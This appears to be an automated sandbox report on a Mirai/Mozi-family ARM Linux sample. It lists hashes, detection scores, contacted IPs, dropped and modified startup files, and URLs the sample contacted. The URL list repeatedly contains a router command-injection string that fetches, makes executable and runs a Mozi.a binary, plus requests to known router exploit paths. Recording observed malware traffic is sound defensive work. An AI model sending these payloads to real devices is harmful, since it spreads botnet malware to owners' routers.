top title background image
flash

mxjzQQFgLp

Status: finished
Submission Time: 2019-12-13 09:56:06 +01:00
Malicious
Spreader
Trojan
Evader
Mirai

Comments

Tags

Details

  • Analysis ID:
    195971
  • API (Web) ID:
    289924
  • Analysis Started:
    2019-12-13 09:57:57 +01:00
  • Analysis Finished:
    2019-12-13 10:09:52 +01:00
  • MD5:
    9a111588a7db15b796421bd13a949cd4
  • SHA1:
    034c8c51a58be11ca620ce3eb0d43d5a59275d2f
  • SHA256:
    e15e93db3ce3a8a22adb4b18e0e37b93f39c495e4a97008f9b1a9a42e1fac2b0
  • Technologies:

Joe Sandbox

Engine Download Report Detection Info
malicious
Score: 100
System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

Third Party Analysis Engines

malicious
Score: 24/58
malicious
Score: 10/39
malicious

IPs

IP Country Detection
23.203.39.97
United States
14.77.144.206
Korea Republic of
24.91.133.171
United States
Click to see the 97 hidden entries
128.210.46.231
United States
108.78.173.187
United States
183.44.78.64
China
8.105.106.151
United States
40.148.0.146
United States
24.145.242.61
United States
144.221.159.254
United States
94.178.33.146
Ukraine
61.116.223.122
Japan
198.76.195.65
United States
177.34.96.123
Brazil
177.127.254.12
Brazil
220.151.74.158
Japan
125.159.118.130
Korea Republic of
196.30.90.253
South Africa
41.156.157.123
South Africa
35.211.153.188
United States
137.130.207.18
United States
128.29.160.213
United States
215.0.124.174
United States
18.50.108.149
United States
42.152.218.0
Malaysia
90.101.248.147
France
22.181.210.163
United States
26.111.72.9
United States
52.147.135.116
United States
169.220.18.199
Korea Republic of
181.45.192.186
Argentina
37.157.53.244
United Kingdom
77.94.17.97
Kazakhstan
162.211.204.205
United States
183.81.83.169
Viet Nam
23.152.181.84
Reserved
159.163.131.40
United States
147.148.216.180
United Kingdom
23.208.206.183
United States
222.88.103.117
China
119.52.212.111
China
96.77.174.224
United States
195.19.214.132
Russian Federation
177.203.18.93
Brazil
85.92.226.222
Bosnia and Herzegowina
114.132.209.1
China
9.230.1.174
United States
204.58.16.150
United States
218.55.31.177
Korea Republic of
18.117.130.27
United States
34.213.8.4
United States
110.131.226.39
Japan
63.10.221.121
United States
44.93.60.189
United States
219.56.44.184
Japan
202.235.170.182
Japan
148.155.182.145
United States
65.226.235.116
United States
93.248.103.222
Germany
211.242.217.99
Korea Republic of
98.206.117.117
United States
116.142.157.248
China
199.186.188.229
United States
154.218.88.173
Seychelles
11.110.85.169
United States
189.211.35.120
Mexico
60.100.19.27
Japan
89.124.37.139
Ireland
185.30.183.45
Italy
134.67.207.243
United States
25.111.194.1
United Kingdom
48.105.241.185
United States
117.240.152.3
India
117.4.35.157
Viet Nam
204.136.123.118
United States
140.2.207.197
United States
63.60.229.4
United States
185.86.252.72
France
26.219.58.97
United States
38.35.108.227
United States
25.89.181.68
United Kingdom
121.151.168.241
Korea Republic of
45.104.43.79
Egypt
107.158.106.194
United States
215.195.134.110
United States
215.63.186.142
United States
24.119.56.31
United States
42.158.100.50
China
19.212.62.167
United States
193.30.167.118
Switzerland
207.8.236.181
United States
177.104.27.216
Brazil
163.46.122.20
Japan
67.160.148.232
United States
124.189.220.139
Australia
72.60.15.138
United States
115.239.244.99
China
55.159.69.83
United States
129.8.8.41
United States
98.214.24.199
United States

URLs

Name Detection
http://217.36.211.36:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://47.74.9.21:80/HNAP1/
http://154.83.166.9:80/HNAP1/
Click to see the 42 hidden entries
http://187.140.207.106:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://174.136.77.136:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://154.212.205.222:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://54.152.229.251:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://104.31.155.183:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://165.227.84.166:80/HNAP1/
http://62.63.210.117:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://104.18.159.50:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://23.89.43.3:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://72.246.170.118:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://69.1.108.10:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://104.101.70.229:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://212.3.207.64:37215/ctrlt/DeviceUpgrade_1
http://168.232.148.144:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://187.204.229.63:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://184.26.33.143:80/HNAP1/
http://39.106.55.152:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:80/GponForm/diag_Form?images/
http://50.28.53.76:80/HNAP1/
http://46.209.11.9:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://13.32.37.77:80/HNAP1/
http://127.0.0.1:8080/GponForm/diag_Form?images/
http://159.69.117.44:80/HNAP1/
http://80.13.234.217:80/HNAP1/
http://127.0.0.1:5555/UD/act?1
http://www.alsa-project.org
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://www.alsa-project.org/cardinfo-db/
http://58.237.234.234:49152/soap.cgi?service=WANIPConn1
http://pastebin.ca)
http://127.0.0.1:7574/UD/act?1
http://113.198.84.164:37215/ctrlt/DeviceUpgrade_1
http://www.pastebin.ca.
http://www.pastebin.ca/upload.php
http://81.190.59.148:49152/soap.cgi?service=WANIPConn1
http://www.alsa-project.org.
http://upx.sf.net
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://www.alsa-project.org/alsa-info.sh
http://120.24.210.140:49152/soap.cgi?service=WANIPConn1
http://45.127.163.223:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://www.pastebin.ca

Dropped files

Name File Type Hashes Detection
/etc/init.d/mountdevsubfs.sh
ASCII text
#
/usr/networks
ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
#
/etc/rcS.d/S95baby.sh
POSIX shell script, ASCII text executable
#
Click to see the 97 hidden entries
/etc/rc.local
ASCII text
#
/etc/profile.d/vte-2.91.sh
ASCII text
#
/etc/profile.d/cedilla-portuguese.sh
ASCII text
#
/etc/profile.d/bash_completion.sh
ASCII text
#
/etc/profile.d/apps-bin-path.sh
ASCII text
#
/etc/profile.d/Z97-byobu.sh
ASCII text
#
/etc/init.d/umountnfs.sh
ASCII text
#
/etc/init.d/mountnfs.sh
ASCII text
#
/etc/init.d/mountnfs-bootclean.sh
ASCII text
#
/etc/init.d/mountkernfs.sh
ASCII text
#
/etc/init.d/mountall.sh
ASCII text
#
/etc/init.d/hwclock.sh
ASCII text
#
/etc/init.d/S95baby.sh
POSIX shell script, ASCII text executable
#
/etc/init.d/bootmisc.sh
ASCII text
#
/etc/init.d/checkfs.sh
ASCII text
#
/etc/init.d/checkroot-bootclean.sh
ASCII text
#
/etc/init.d/checkroot.sh
ASCII text
#
/etc/init.d/hostname.sh
ASCII text
#
/etc/init.d/mountall-bootclean.sh
ASCII text
#
/usr/share/doc/git/contrib/remotes2config.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-revert.sh
ASCII text
#
/usr/share/doc/git/contrib/rerere-train.sh
ASCII text
#
/usr/share/doc/git/contrib/subtree/git-subtree.sh
ASCII text
#
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
ASCII text
#
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
ASCII text
#
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
ASCII text
#
/usr/share/doc/git/contrib/git-resurrect.sh
ASCII text
#
/usr/share/doc/git/contrib/fast-import/git-import.sh
ASCII text
#
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-whatchanged.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-verify-tag.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-tag.sh
ASCII text
#
/usr/share/doc/netcat-openbsd/examples/dist.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-resolve.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-reset.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-repack.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-pull.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-notes.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-merge.sh
ASCII text
#
/usr/share/doc/mdadm/examples/mdadd.sh
ASCII text
#
/usr/share/keyutils/request-key-debug.sh
ASCII text
#
/usr/share/hplip/hplip_clean.sh
ASCII text
#
/usr/share/doc/xdotool/examples/ffsp.sh
ASCII text
#
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
ASCII text
#
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh
ASCII text
#
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh
ASCII text
#
/usr/share/doc/tmux/examples/bash_completion_tmux.sh
ASCII text
#
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
ASCII text
#
/usr/share/doc/gdb/contrib/gdb-add-index.sh
ASCII text
#
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh
ASCII text
#
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
ASCII text
#
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
ASCII text
#
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh
ASCII text
#
/usr/share/doc/libsane/plustek/MakeModule.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/ping-places.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/get-mac-address.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/check-mac-address.sh
ASCII text
#
/etc/wpa_supplicant/ifupdown.sh
ASCII text
#
/usr/share/doc/acpid/examples/ac.sh
ASCII text
#
/usr/share/debconf/confmodule.sh
ASCII text
#
/usr/share/cups/braille/indexv4.sh
ASCII text
#
/usr/share/cups/braille/indexv3.sh
ASCII text
#
/usr/share/cups/braille/index.sh
ASCII text
#
/usr/share/cups/braille/cups-braille.sh
UTF-8 Unicode text
#
/usr/share/brltty/initramfs/brltty.sh
ASCII text
#
/usr/share/alsa/utils.sh
ASCII text
#
/usr/share/alsa-base/alsa-info.sh
ASCII text, with very long lines
#
/usr/share/doc/acpid/examples/default.sh
ASCII text
#
/etc/wpa_supplicant/functions.sh
ASCII text
#
/etc/wpa_supplicant/action_wpa.sh
ASCII text
#
/etc/libreoffice/soffice.sh
ASCII text
#
/etc/bash_completion.d/libreoffice.sh
ASCII text
#
/etc/acpi/undock.sh
ASCII text
#
/etc/acpi/tosh-wireless.sh
ASCII text
#
/etc/acpi/powerbtn.sh
ASCII text
#
/etc/acpi/ibm-wireless.sh
ASCII text
#
/etc/acpi/asus-wireless.sh
ASCII text
#
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-ls-remote.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-log.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-gc.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-fetch.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-commit.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-clone.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-clean.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-checkout.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-am.sh
OS/2 REXX batch file, ASCII text
#
/usr/share/doc/git/contrib/examples/git-merge-ours.sh
ASCII text
#
/etc/acpi/asus-keyboard-backlight.sh
ASCII text
#
/usr/share/doc/gdb/contrib/expect-read1.sh
ASCII text
#
/usr/share/doc/gdb/contrib/ari/gdb_find.sh
ASCII text
#
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
ASCII text
#
/usr/share/doc/gawk/examples/prog/igawk.sh
awk or perl script, ASCII text
#
/usr/share/doc/gawk/examples/network/PostAgent.sh
ASCII text
#
/usr/share/doc/cron/examples/cron-tasks-review.sh
ASCII text
#
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
ASCII text
#